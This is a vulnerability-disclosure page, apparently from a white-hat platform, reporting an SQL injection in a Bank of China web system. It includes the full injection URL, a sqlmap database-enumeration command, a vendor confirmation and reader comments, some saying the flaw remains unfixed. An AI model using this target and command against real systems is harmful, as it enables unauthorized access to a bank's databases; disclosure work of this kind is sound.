中国银行某系统存在SQL注入漏洞

http、https协议都可注射。

注射点：https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000018

报错信息：

sqlmap高级命令

sqlmap.py -u "https://e.boc.cn/ehome/SQISOFT/web/webNew/nWuguanIndex.aspx?WuguanId=EP0000000018" --dbs --level=1

影响数据库：

当前数据库“EINNER”共287个表：

受影响的系统用户：

构造SQL查询时，请使用参数化查询、验证输入对用户输入的数据进行全面安全检查或过滤，尤其注意检查是否包含HTML特殊字符。这些检查或过滤必须在服务器端完成，建议过滤的常见危险字符。

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-09-22 11:56

厂商回复：

非常感谢漏洞作者的发现，我们将尽快修补。

最新状态：

暂无

1. 2014-09-17 18:59 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

   1

   这是欢迎新厂商的节奏啊

   1# 回复此人

2. 2014-09-17 19:00 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

   0

   吓尿了

   2# 回复此人

3. 2014-09-17 19:13 | 魇 ( 普通白帽子 | Rank:1218 漏洞数:107 | 传闻中魇是一个惊世奇男子， 但是除了他华...)

   0

   @浩天 @疯狗 洞主是想告诉你们中国很行

   3# 回复此人

4. 2014-09-17 19:48 | 番茄炒蛋 ( 普通白帽子 | Rank:187 漏洞数:50 | 这条路还很长，还需要更努力)

   0

   大牛。。

   4# 回复此人

5. 2014-09-17 20:01 | George乔治 ( 路人 | Rank:6 漏洞数:2 | 社会工程学联盟:www.cnseu.cn)

   0

   笑尿了我啊啊

   5# 回复此人

6. 2014-09-17 20:06 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

   0

   一群死黑阔 一个个都这么牛b

   6# 回复此人

7. 2014-09-17 20:43 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

   0

   好厉害的样子啊。

   7# 回复此人

8. 2014-09-17 20:55 | JJ Fly ( 普通白帽子 | Rank:317 漏洞数:59 | 冰眼信息科技安全研究院)

   0

   真叼。

   8# 回复此人

9. 2014-09-17 21:11 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈，看世间千姿百态...)

   0

   专注SQL 20年！！！ 蓝翔开学入学考试 望通过

   9# 回复此人

10. 2014-09-17 21:12 | jas10nsec ( 路人 | Rank:14 漏洞数:4 | 学习网络与信息安全中)

    0

    洞主好搞笑啊

    10# 回复此人

11. 2014-09-17 22:30 | darkrerror ( 普通白帽子 | Rank:337 漏洞数:53 | 学习)

    0

    @疯狗 怎么把名称改了- -

    11# 回复此人

12. 2014-09-17 22:49 | Coody ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)

    0

    新...厂...商...

    12# 回复此人

13. 2014-09-18 01:26 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    0

    一群狼啊。

    13# 回复此人

14. 2014-09-19 18:31 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

    0

    新厂商来了

    14# 回复此人

15. 2014-09-22 17:05 | 爱上平顶山 ( 核心白帽子 | Rank:3144 漏洞数:625 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    0

    @浩天 @疯狗 我擦 有中国银行啊 不客气了·

    15# 回复此人

16. 2014-09-22 18:10 | 浩天 ( 普通白帽子 | Rank:925 漏洞数:80 | 哈！躁起来！)

    0

    @爱上平顶山 期待你为中国银行安全性作出贡献的案例

    16# 回复此人

17. 2014-09-22 19:00 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

    1

    @爱上平顶山 感谢您对中国很行做出的贡献

    17# 回复此人

18. 2014-11-01 21:20 | 侦探911 ( 普通白帽子 | Rank:164 漏洞数:27 | 学习)

    1

    现在都还没修复。。。也是醉了

    18# 回复此人

19. 2014-11-01 21:39 | 1angxi ( 路人 | Rank:2 漏洞数:1 | 研究僧，安全新手，我只是来打酱油的...)

    1

    还没完全修复..

    19# 回复此人

20. 2014-11-02 02:02 | 0ps ( 实习白帽子 | Rank:43 漏洞数:10 | xo)

    0

    专业马赛克！！！！！

    20# 回复此人

21. 2014-11-02 13:26 | aNsSe ( 路人 | Rank:0 漏洞数:2 | 独自一人走天下)

    0

    卧槽！ 洞主你为何这么叼！

    21# 回复此人

22. 2014-11-02 15:21 | darkrerror ( 普通白帽子 | Rank:337 漏洞数:53 | 学习)

    1

    @0ps - -

    22# 回复此人